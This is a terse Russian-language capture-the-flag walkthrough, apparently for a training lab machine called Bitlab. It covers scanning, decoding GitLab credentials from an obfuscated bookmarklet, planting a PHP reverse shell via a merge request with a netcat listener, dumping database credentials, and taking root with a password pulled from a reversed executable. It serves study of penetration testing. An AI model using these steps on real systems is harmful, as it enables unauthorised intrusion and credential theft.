Обзор сервисов
$ nmap -sC -sV -sT -Pn -p- -v -oN nmap 10.10.10.114
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a2:3b:b0:dd:28:91:bf:e8:f9:30:82:31:23:2f:92:18 (RSA)
| 256 e6:3b:fb:b3:7f:9a:35:a8:bd:d0:27:7b:25:d4:ed:dc (ECDSA)
|_ 256 c9:54:3d:91:01:78:03:ab:16:14:6b:cc:f0:b7:3a:55 (ED25519)
80/tcp closed http
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Gobuster:
gitlab
http://10.10.10.114/users/sign_in
profile
http://10.10.10.114/profile/
help
http://10.10.10.114/help/
Gitlab Login
=> копируем gitlab login
javascript:(function(){ var _0x4b18=["\x76\x61\x6C\x75\x65","\x75\x73\x65\x72\x5F\x6C\x6F\x67\x69\x6E","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x63\x6C\x61\x76\x65","\x75\x73\x65\x72\x5F\x70\x61\x73\x73\x77\x6F\x72\x64","\x31\x31\x64\x65\x73\x30\x30\x38\x31\x78"];document[_0x4b18[2]](_0x4b18[1])[_0x4b18[0]]= _0x4b18[3];document[_0x4b18[2]](_0x4b18[4])[_0x4b18[0]]= _0x4b18[5]; })()
=>
function() {
var _0x4b18 = ["value", "user_login", "getElementById", "clave", "user_password", "11des0081x"];
document[_0x4b18[2]](_0x4b18[1])[_0x4b18[0]] = _0x4b18[3];
document[_0x4b18[2]](_0x4b18[4])[_0x4b18[0]] = _0x4b18[5];
})()
=> clave:11des0081x
PostgreSQL
http://10.10.10.114/snippets/1
$db_connection = pg_connect("host=localhost dbname=profiles user=profiles password=profiles");
=> developer роль => можно модифицировать файлы => коммитим => мержим:
=> добавляем новый файл => shell.php
=> копируем шелл из revshell.com => одобряем merge request.
nc -lnvp 1234
curl http://10.10.10.114/profile/shell.php
Пользователь
<?php
$db_connection = pg_connect("host=localhost dbname=profiles user=profiles
password=profiles");
$result = pg_query($db_connection, "SELECT * FROM profiles");
print_r(pg_fetch_all($result));
?>
$ echo PD9waHAKJGRiX2Nvbm5lY3Rpb24gPSBwZ19jb25uZWN0KCJob3N0PWxvY2FsaG9zdCBkYm5hbWU9cHJvZmlsZXMgdXNlcj1wcm9maWxlcwpwYXNzd29yZD1wcm9maWxlcyIpOwokcmVzdWx0ID0gcGdfcXVlcnkoJGRiX2Nvbm5lY3Rpb24sICJTRUxFQ1QgKiBGUk9NIHByb2ZpbGVzIik7CnByaW50X3IocGdfZmV0Y2hfYWxsKCRyZXN1bHQpKTsKPz4K | base64 -d > pg.php
$ php pg.php
Array
(
[0] => Array
(
[id] => 1
[username] => clave
[password] => c3NoLXN0cjBuZy1wQHNz==
)
)
=> clave:ssh-str0ng-p@ss
$ ssh [email protected]
c3NoLXN0cjBuZy1wQHNz==
Флаг пользователя
clave@bitlab:~$ cat user.txt
1e3fd81ec3aa2f1462370ee3c20b8154
Повышение привилегий
clave@bitlab:~$ ls -la
total 44
drwxr-xr-x 4 clave clave 4096 Aug 8 2019 .
drwxr-xr-x 3 root root 4096 Feb 28 2019 ..
lrwxrwxrwx 1 root root 9 Feb 28 2019 .bash_history -> /dev/null
-rw-r--r-- 1 clave clave 3771 Feb 28 2019 .bashrc
drwx------ 2 clave clave 4096 Aug 8 2019 .cache
drwx------ 3 clave clave 4096 Aug 8 2019 .gnupg
-rw-r--r-- 1 clave clave 807 Feb 28 2019 .profile
-r-------- 1 clave clave 13824 Jul 30 2019 RemoteConnection.exe
-r-------- 1 clave clave 33 Feb 28 2019 user.txt
=> RemoteConnection.exe
=> скачиваем файл и реверсим его с помощью IDA или Ghidra => root:Qf7]8YSV.wDNF*[7d?j&eD4^
$ ssh [email protected]
Qf7]8YSV.wDNF*[7d?j&eD4^
Флаг суперпользователя
root@bitlab:~# ip addr
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 00:50:56:b9:6f:4e brd ff:ff:ff:ff:ff:ff
inet 10.10.10.114/24 brd 10.10.10.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 dead:beef::250:56ff:feb9:6f4e/64 scope global dynamic mngtmpaddr
valid_lft 86194sec preferred_lft 14194sec
inet6 fe80::250:56ff:feb9:6f4e/64 scope link
valid_lft forever preferred_lft forever
3: docker0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default
link/ether 02:42:3e:a9:22:d3 brd ff:ff:ff:ff:ff:ff
inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
valid_lft forever preferred_lft forever
4: br-c8b1f0816703: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
link/ether 02:42:05:0c:80:86 brd ff:ff:ff:ff:ff:ff
inet 172.19.0.1/16 brd 172.19.255.255 scope global br-c8b1f0816703
valid_lft forever preferred_lft forever
inet6 fe80::42:5ff:fe0c:8086/64 scope link
valid_lft forever preferred_lft forever
6: vethb1906a4@if5: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master br-c8b1f0816703 state UP group default
link/ether ea:3d:dc:08:b5:e5 brd ff:ff:ff:ff:ff:ff link-netnsid 1
inet6 fe80::e83d:dcff:fe08:b5e5/64 scope link
valid_lft forever preferred_lft forever
8: veth692e1a6@if7: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master br-c8b1f0816703 state UP group default
link/ether 52:a4:98:2d:51:fb brd ff:ff:ff:ff:ff:ff link-netnsid 0
inet6 fe80::50a4:98ff:fe2d:51fb/64 scope link
valid_lft forever preferred_lft forever
10: vethf7f0047@if9: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master br-c8b1f0816703 state UP group default
link/ether ba:14:10:51:8a:e7 brd ff:ff:ff:ff:ff:ff link-netnsid 2
inet6 fe80::b814:10ff:fe51:8ae7/64 scope link
valid_lft forever preferred_lft forever
12: vethf1e2fb0@if11: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master br-c8b1f0816703 state UP group default
link/ether f6:ca:39:14:3a:5e brd ff:ff:ff:ff:ff:ff link-netnsid 3
inet6 fe80::f4ca:39ff:fe14:3a5e/64 scope link
valid_lft forever preferred_lft forever
root@bitlab:~# id
uid=0(root) gid=0(root) groups=0(root)
root@bitlab:~# ls
root.txt
root@bitlab:~# cat root.txt
8d4cc131757957cb68d9a0cddccd587c